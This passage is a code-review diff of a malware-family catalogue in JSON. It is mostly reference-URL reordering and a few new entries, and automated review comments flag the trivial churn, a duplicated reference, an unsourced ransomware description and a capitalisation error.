"https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", + "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", + "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://intel471.com/blog/malvertising-surges-to-distribute-malware", + "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://isc.sans.edu/diary/rss/28934", + "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/", + "https://isc.sans.edu/diary/28636", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", + 
"https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/", + "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://tccontre.blogspot.com/2021/01/", + "https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view", + "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/", + "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", + "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", + "https://www.youtube.com/watch?v=wMXD4Sv1Alw", + "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/", + "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", + "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", + "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic", + "https://www.youtube.com/watch?v=oZ4bwnjcXWg", + "https://github.com/0xThiebaut/PCAPeek/", + "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure", + "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns", + "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", "https://blog.minerva-labs.com/icedid-maas", - "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", + "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", + "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", + "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", + "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", + "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", + "https://twitter.com/embee_research/status/1592067841154756610?s=20", + "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/", + "https://www.team-cymru.com/post/from-chile-with-malware", + "https://twitter.com/Unit42_Intel/status/1645851799427874818", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/", + "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol", + "https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf", + "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/", + "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", + "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/", + "https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/", + "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak" ], "synonyms": [ "BokBot", 
@@ -28630,9 +29982,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
+ "https://threatray.com/blog/a-new-icedid-gziploader-variant/",
 "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://threatray.com/blog/a-new-icedid-gziploader-variant/"
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
 ],
 "synonyms": [],
 "type": []
@@ -28645,11 +29997,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
 "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
 "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
 "http://www.kz-cert.kz/page/502",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
 ],
 "synonyms": [
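Review bot: The refs array of win.icedid_downloader is re-emitted with its second and fourth entries swapped and nothing else changed, and the same pure reordering makes up the hunks at @@ -28645, @@ -28708, @@ -28751, @@ -28782, @@ -28796, @@ -28831, @@ -28882 and @@ -28922, while the descriptions at @@ -28674 and @@ -28882 only change `’` to `\u2019`, which parses to the same string. Both renderings are valid JSON, so the data itself needs no change, but the generator that rebuilds this cluster file should emit refs in a stable order (sorted, or the upstream order it already had) and keep one `ensure_ascii` setting, so that a regeneration diff shows only real content changes. As it stands the few genuine edits in this commit, such as the duplicate entry at @@ -28723, are buried under thousands of lines of shuffle.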
@@ -28674,14 +30026,14 @@
 "value": "win.icexloader"
 },
 {
- "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
+ "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
 "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
 "https://securelist.com/ice-ix-not-cool-at-all/29111/",
- "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/"
+ "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/"
 ],
 "synonyms": [],
 "type": []
@@ -28708,10 +30060,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
- "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
 "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
- "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
- "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html"
+ "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/"
 ],
 "synonyms": [],
 "type": []
@@ -28723,6 +30075,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart"
 ],
 "synonyms": [
@@ -28733,6 +30086,19 @@
 "uuid": "bcc8b6ea-9295-4a22-a70d-422b1fd9814e",
 "value": "IcyHeart"
 },
+ {
+ "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelg\u00e4nging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idat_loader",
+ "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1033c988-41db-4f16-9e40-670397b50db8",
+ "value": "IDAT Loader"
+ },
 {
 "description": "",
 "meta": {
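Review bot: The @@ -28723 hunk adds `"https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart",` directly above the identical entry that already closes the array, so the IcyHeart refs now hold the same URL twice. A repeated reference carries no information and looks like an artefact of the regeneration rather than an intended edit; the added line should be dropped, or the generator should deduplicate refs before writing them out. The new IDAT Loader entry in the next hunk uses the same `refs`/`synonyms`/`type` layout as its neighbours and raises no issue on its own.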
@@ -28751,9 +30117,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
 "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
 "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
 ],
 "synonyms": [],
@@ -28782,8 +30148,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
 ],
 "synonyms": [],
 "type": []
@@ -28796,16 +30162,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
 "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
- "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
 "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/"
+ "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html",
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america"
 ],
 "synonyms": [],
 "type": []
@@ -28831,8 +30197,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.incontroller",
- "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan",
- "https://twitter.com/silascutler/status/1514366443277766656"
+ "https://twitter.com/silascutler/status/1514366443277766656",
+ "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan"
 ],
 "synonyms": [],
 "type": []
@@ -28882,31 +30248,31 @@
 "value": "Industrial Spy"
 },
 {
- "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
+ "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
- "https://cert.gov.ua/article/39518",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
- "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://en.wikipedia.org/wiki/Industroyer",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://en.wikipedia.org/wiki/Industroyer",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
+ "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
 "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
 "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://cert.gov.ua/article/39518",
+ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/"
 ],
 "synonyms": [
 "Crash",
@@ -28922,28 +30288,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2",
- "https://twitter.com/silascutler/status/1513870210398363651",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
 "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/",
- "https://blog.scadafence.com/industroyer2-attack",
 "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://cert.gov.ua/article/39518",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
- "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
- "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
- "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://twitter.com/silascutler/status/1513870210398363651",
+ "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
+ "https://pylos.co/2022/04/23/industroyer2-in-perspective/",
 "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf",
 "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks",
- "https://pylos.co/2022/04/23/industroyer2-in-perspective/"
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.mandiant.com/resources/blog/gru-disruptive-playbook",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
+ "https://blog.scadafence.com/industroyer2-attack",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cert.gov.ua/article/39518",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/"
 ],
 "synonyms": [],
 "type": []
@@ -28964,6 +30331,19 @@
 "uuid": "7638ac2e-0cdc-4101-8e3d-54b7b74a9c92",
 "value": "Inferno"
 },
+ {
+ "description": "InfinityLock ransomware is a type of malicious software that encrypts a victim's files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infinitylock",
+ "https://anti-spyware-101.com/remove-infinitylock-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "37fca614-e29a-4029-8afd-d3de61aa3ba0",
+ "value": "InfinityLock"
+ },
 {
 "description": "Ransomware.",
 "meta": {
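Review bot: The InfinityLock description states concrete claims (spread through phishing emails and malicious websites, a ransom of $1,000 in Bitcoin) without naming where they come from, while the other descriptions added in this commit, Invicta Stealer and IsaacWiper, open with `According to Cyble` / `According to Recorded Future`. Prefixing the source keeps the entry consistent with those and lets a reader weigh the claim, e.g. `"description": "According to [SOURCE], InfinityLock ransomware is ..."` where [SOURCE] is the reference the text was drawn from. Of the two refs only anti-spyware-101.com is a write-up, so it is presumably the origin of the figure; worth confirming before the dollar amount is published as fact.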
@@ -28982,15 +30362,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy",
- "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
- "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
- "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
+ "https://cloud.tencent.com/developer/article/1738806",
 "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
 "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/",
- "https://cloud.tencent.com/developer/article/1738806",
+ "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
+ "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
 "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
- "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/"
+ "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
+ "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/"
 ],
 "synonyms": [
 "Foudre"
@@ -29052,19 +30432,32 @@
 "uuid": "fa022849-248c-4620-86b4-2a36c704b288",
 "value": "Interception (Windows)"
 },
+ {
+ "description": "According to Cyble, The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invicta_stealer",
+ "https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "00a078bf-90db-4275-b7bd-0da757dd2284",
+ "value": "Invicta Stealer"
+ },
 {
 "description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/",
 "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
 "https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
 ],
 "synonyms": [],
 "type": []
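Review bot: The Invicta Stealer description capitalises `The` mid-sentence: `According to Cyble, The Invicta Stealer can collect ...` should read `According to Cyble, the Invicta Stealer can collect ...`. It is the only new prose in this hunk, the rest being a reorder of the InvisiMole refs, so it is the one line worth touching before merge.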
@@ -29087,13 +30480,13 @@
 "value": "Ironcat"
 },
 {
- "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.",
